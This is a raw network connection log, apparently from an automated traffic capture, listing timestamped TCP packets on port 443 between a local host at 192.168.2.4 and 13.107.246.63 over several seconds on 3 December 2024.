                                                                        Dec 3, 2024 17:52:01.021804094 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.021830082 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.022677898 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.022684097 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.037098885 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.037549973 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.037569046 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.038080931 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.038085938 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.464277983 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.464901924 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.464920998 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.465399981 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.465405941 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.469398022 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.469677925 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.469697952 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.470046997 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.470052004 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.479506016 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.479648113 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.479708910 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.479825020 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.479835033 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.479854107 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.479859114 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.482727051 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.482769012 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.482856989 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.483006001 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.483020067 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.517467976 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.520466089 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.520522118 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.520535946 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.520605087 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.520668030 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.520688057 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.520747900 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.520755053 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.524645090 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.524693012 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.524770021 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.524904966 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.524919033 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.793807030 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.794440031 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.794466019 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.794893026 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.794898987 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.905544996 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.905586004 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.905633926 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.905653000 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.905704021 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.905946970 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.905965090 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.905976057 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.905981064 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.908725023 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.908775091 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.909028053 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.909028053 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:01.909064054 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.999222994 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.002078056 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.002157927 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.002187014 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.002197981 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.002214909 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.002219915 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.005024910 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.005050898 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.005136967 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.005264997 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.005276918 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.242994070 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.243079901 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.243143082 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.243335009 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.243355989 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.243371964 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.243376970 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.246512890 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.246555090 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:02.246644974 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.246819019 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:02.246834040 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.276746035 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.277271986 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.277288914 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.277858973 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.277863026 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.412046909 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.412591934 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.412614107 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.413057089 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.413063049 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.722510099 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.723162889 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.723186016 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.723623991 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.723628044 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.743845940 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.746880054 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.747090101 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.747090101 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.749154091 CET49989443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.749177933 CET4434998913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.750473022 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.750504017 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.750572920 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.750725985 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.750737906 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.789865971 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.790461063 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.790471077 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.794784069 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.794789076 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.865387917 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.865514040 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.865613937 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.865756989 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.865777969 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.865789890 CET49990443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.865797997 CET4434999013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.869498014 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.869530916 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:03.869612932 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.869765043 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:03.869784117 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.046858072 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.047444105 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.047466993 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.047889948 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.047894955 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.170281887 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.170378923 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.170432091 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.170455933 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.170476913 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.170675993 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.170675993 CET49991443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.170701981 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.170711994 CET4434999113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.173685074 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.173702955 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.173788071 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.173988104 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.173996925 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.241595984 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.244683027 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.244755983 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.244788885 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.244797945 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.244808912 CET49992443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.244817972 CET4434999213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.247674942 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.247724056 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.247809887 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.247950077 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.247965097 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.494575024 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.498548031 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.498613119 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.498630047 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.498665094 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.498727083 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.498749971 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.498764992 CET49993443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.498773098 CET4434999313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.501919031 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.501966953 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:04.502055883 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.502203941 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:04.502214909 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.820961952 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.821504116 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:05.821513891 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.821954012 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:05.821958065 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.866556883 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.867157936 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:05.867187977 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:05.867609024 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:05.867616892 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.139286995 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.139924049 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.139956951 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.140414000 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.140419960 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.308023930 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.308099031 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.308156013 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.308326960 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.308336973 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.308348894 CET49994443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.308353901 CET4434999413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.311228991 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.311283112 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.311357021 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.311494112 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.311507940 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.323761940 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.323790073 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.323837042 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.323860884 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.323894024 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.324069977 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.324090958 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.324100018 CET49995443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.324105024 CET4434999513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.326330900 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.326356888 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.326457977 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.326543093 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.326566935 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.326576948 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.326864004 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.326873064 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.327305079 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.327310085 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.620398998 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.623735905 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.623815060 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.623859882 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.623882055 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.623900890 CET49996443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.623909950 CET4434999613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.626589060 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.626626968 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.626714945 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.626856089 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.626868963 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.657145977 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.657701969 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.657716036 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.658193111 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.658201933 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.776813030 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.779841900 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.779925108 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.779985905 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.780006886 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.780019045 CET49997443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.780025005 CET4434999713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.782881021 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.782917976 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:06.783030033 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.783166885 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:06.783180952 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.113734961 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.116718054 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.116811991 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.116856098 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.116856098 CET49998443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.116873980 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.116884947 CET4434999813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.119688988 CET50003443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.119713068 CET4435000313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:07.119797945 CET50003443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.119990110 CET50003443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:07.120001078 CET4435000313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.180951118 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.181562901 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.181596994 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.182034016 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.182039976 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.226305008 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.226702929 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.226736069 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.227130890 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.227135897 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.539525986 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.540115118 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.540138960 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.540517092 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.540522099 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.636944056 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637095928 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637162924 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637211084 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.637367010 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.637387991 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637398958 CET50000443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.637404919 CET4435000013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637479067 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.637487888 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.637936115 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.637942076 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.640177965 CET50004443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.640232086 CET4435000413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.640305996 CET50004443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.640429020 CET50004443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.640444040 CET4435000413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.686439037 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.689383030 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.689433098 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.689440966 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.689483881 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.689526081 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.689548969 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.689574003 CET49999443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.689579964 CET4434999913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.691979885 CET50005443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.692014933 CET4435000513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:08.692084074 CET50005443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.692214012 CET50005443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:08.692226887 CET4435000513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.005408049 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.005477905 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.005541086 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.005765915 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.005779028 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.005788088 CET50001443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.005794048 CET4435000113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.008639097 CET50006443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.008682966 CET4435000613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.008779049 CET50006443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.008894920 CET50006443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.008909941 CET4435000613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.111176968 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.114162922 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.114248037 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.114281893 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.114300013 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.114312887 CET50002443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.114317894 CET4435000213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.116883993 CET50007443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.116930962 CET4435000713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.116998911 CET50007443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.117142916 CET50007443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.117155075 CET4435000713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.232014894 CET4435000313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:09.234349012 CET50003443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:09.234363079 CET4435000313.107.246.63192.168.2.4
